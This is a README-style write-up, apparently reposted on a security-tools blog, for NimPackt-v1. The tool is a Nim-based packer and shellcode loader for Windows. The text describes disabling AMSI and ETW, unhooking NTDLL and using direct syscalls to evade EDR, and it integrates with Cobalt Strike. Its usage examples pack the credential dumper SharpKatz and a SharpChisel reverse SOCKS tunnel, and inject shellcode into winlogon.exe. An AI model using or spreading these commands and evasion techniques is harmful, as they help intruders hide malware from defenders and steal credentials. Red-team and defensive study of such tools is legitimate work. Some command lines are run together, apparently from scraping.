NimPackt-v1 - Nim-based Assembly Packer And Shellcode Loader For Opsec And Profit

By Cas van Cooten (@chvancooten)

With special thanks to Marcello Salvati (@byt3bl33der) and Fabian Mosch (@S3cur3Th1sSh1t)


Update: NimPackt-v1 is among the worst code I have ever written (I was just starting out learning Nim). Because of this, I started on a full rewrite of NimPackt, dubbed 'NimPackt-NG' (currently still private). With this re-write, I decided to open-source the old branch ("NimPackt-v1"). As such, this branch is no longer maintained and comes without any form of warranty or support. PRs are always welcome, of course :)

NimPackt is a Nim-based packer for .NET (C#) executables and shellcode targeting Windows. It automatically wraps the payload in a Nim binary that is compiled to Native C and as such harder to detect and reverse engineer. There are two main execution methods:

  • Execute-Assembly re-packs a .NET executable and runs it, optionally applying evasive measures such as API unhooking, AMSI patching, or disabling ETW.
  • Shinject takes raw a .bin file with raw, position-independent shellcode and executes it locally or in a remote process, optionally using direct syscalls to trigger the shellcode or patching API hooks to evade EDR.

Currently, NimPackt has the following features.

  • Uses static syscalls to patch execute to evade EDR
  • Unhooks user-mode APIs for spawned thread by refreshing NTDLL.dll using ShellyCoat
  • Patches Event Tracing for Windows (ETW)
  • Patches the Anti-Malware Scan Interface (AMSI)
  • AES-encrypts payload with random key to prevent static analysis or fingerprinting
  • Compiles to exe or dll
  • Supports cross-platform compilation (from both Linux and Windows)
  • Integrates with CobaltStrike for ezpz payload generation

A great source for C#-based binaries for offensive tooling can be found here. It is highly recommended to compile the C# binaries yourself. Even though embedded binaries are encrypted, you should obfuscate sensitive binaries (such as Mimikatz) to lower the risk of detection.


If you are having issues compiling the binary with Syscalls, try downgrading your GCC to version 8.1.0 (especially on Windows). ALWAYS test generated payloads!

On Linux, simply install the required packages and use the Nimble package installer to install the required packages and Python libraries.

pycryptodome argparse nimble install winim nimcrypto">
sudo apt install -y python3 mingw-w64 nimpip3 install pycryptodome argparsenimble install winim nimcrypto

On Windows, execute the Nim installer from here. Make sure to install mingw and set the path values correctly using the provided finish.exe utility. If you don't have Python3 install that, then install the required packages as follows.

nimble install winim nimcryptopip3 install pycryptodome argparse


The Docker image chvancooten/nimbuild can be used to compile NimPackt-v1 binaries. Using Docker is easy and avoids dependency issues, as all required dependencies are pre-installed in this container.

To use it, install Docker for your OS and ensure the input shellcode is in the current folder. Then, start the compilation in a container as follows.

docker run --rm -v `pwd`:/usr/src/np -w /usr/src/np chvancooten/nimbuild python3 -e shinject -i sc.bin

CobaltStrike Plugin

To install the CobaltStrike plugin, select Cobalt Strike -> Script Manager from the menu bar, and select Load. Make sure to load the .cna file from it's original location, otherwise it won't be able to find the NimPackt script files!


usage: [-h] -e EXECUTIONMODE -i INPUTFILE [-a ARGUMENTS] [-na] [-ne] [-r]                   [-t INJECTTARGET] [-E] [-o OUTPUTFILE] [-nu] [-ns] [-f FILETYPE] [-s] [-32] [-S]                   [-d] [-v] [-V]required arguments:  -e EXECUTIONMODE, --executionmode EXECUTIONMODE                        Execution mode of the packer. Supports "execute-assembly" or "shinject"  -i INPUTFILE, --inputfile INPUTFILE                        C# .NET binary executable (.exe) or shellcode (.bin) to wrapexecute-assembly arguments:  -a ARGUMENTS, --arguments ARGUMENTS                        Arguments to "bake into" the wrapped binary, or "PASSTHRU" to accept run-                        time arguments (default)  -na, --nopatchamsi    Do NOT patch (disable) the Anti-Malware Scan Interface (AMSI)  -ne, --nodisableetw   Do NOT disable Event Tracing    for Windows (ETW)shinject arguments:  -r, --remote          Inject shellcode into remote process (default false)  -t INJECTTARGET, --target INJECTTARGET                        Remote thread targeted for remote process injection  -E, --existing        Remote inject into existing process rather than a newly spawned one (default                        false, implies -r) (WARNING: VOLATILE)other arguments:  -o OUTPUTFILE, --outfile OUTPUTFILE                        Filename of the output file (e.g. "LegitBinary"). Specify WITHOUT extension                        or path. This property will be stored in the output binary as the original                        filename  -nu, --nounhook       Do NOT unhook user-mode API hooks in the target process by loading a fresh                        NTDLL.dll  -ns, --nosyscalls     Do NOT use direct syscalls (Windows generation 7-10) instead of high-level                           APIs to evade EDR  -f FILETYPE, --filetype FILETYPE                        Filetype to compile ("exe" or "dll", default: "exe")  -s, --sleep           Sleep for approx. 30 seconds by calculating primes  -32, --32bit          Compile in 32-bit mode (untested)  -S, --showConsole     Show a console window with the app's output when running  -d, --debug           Enable debug mode (retains .nim source file in output folder)  -v, --verbose         Print debug messages of the wrapped binary at runtime  -V, --version         show program's version number and exit


# Pack SharpKatz to accept arguments at runtime, patching NTDLL hooks, AMSI, and ETW while printing verbose messages to a visible console at runtimepython3 ./ -e execute-assembly -i bins/SharpKatz-x64.exe -S -v# Pack Seatbelt as a DLL file with baked-in arguments (note: write to outfile because stdout is not available for DLLs)python3 ./ -f dll -e execute-assembly -i Seatbelt.exe -a "-group=all -outputfile=c:\users\public\downloads\sb.txt"# Pack SharpChisel with a built-in ChiselChief connection string, do not unhook, patch AMSI, or disable ETW, hide the application window at runtimepython3 -nu -na -ne -e execute-assembly -i bins/SharpChisel.exe -a 'client --keepalive 25s --max-retry-interval 25s R:10073:socks'# Pack raw shellcode to DLL file that executes in the local thre   ad through direct syscalls, unhooking NTDLL as well# Shellcode generated with 'msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o /tmp/calc.bin'python3 -i calc.bin -e shinject -f dll# Pack raw shellcode to execute in a newly spawned Calculator thread in an invisible windowpython3 -i calc.bin -e shinject -t "calc.exe"# Pack raw shellcode to execute in the existing Winlogon process (first PID with name 'winlogon.exe'), do not use direct syscalls or unhook NTDLLpython3 -i calc.bin -e shinject -r -E -t "winlogon.exe" -nu -ns

Binaries are stored in the output subfolder of your installation directory. Generated dll files can be executed as follows (entry point can be changed in the Nim template):

rundll32 exampleShinjectNimPackt.dll,IconSrv

NimPackt-v1 - Nim-based Assembly Packer And Shellcode Loader For Opsec And Profit NimPackt-v1 - Nim-based Assembly Packer And Shellcode Loader For Opsec And Profit Reviewed by Zion3R on 8:36 Rating: 5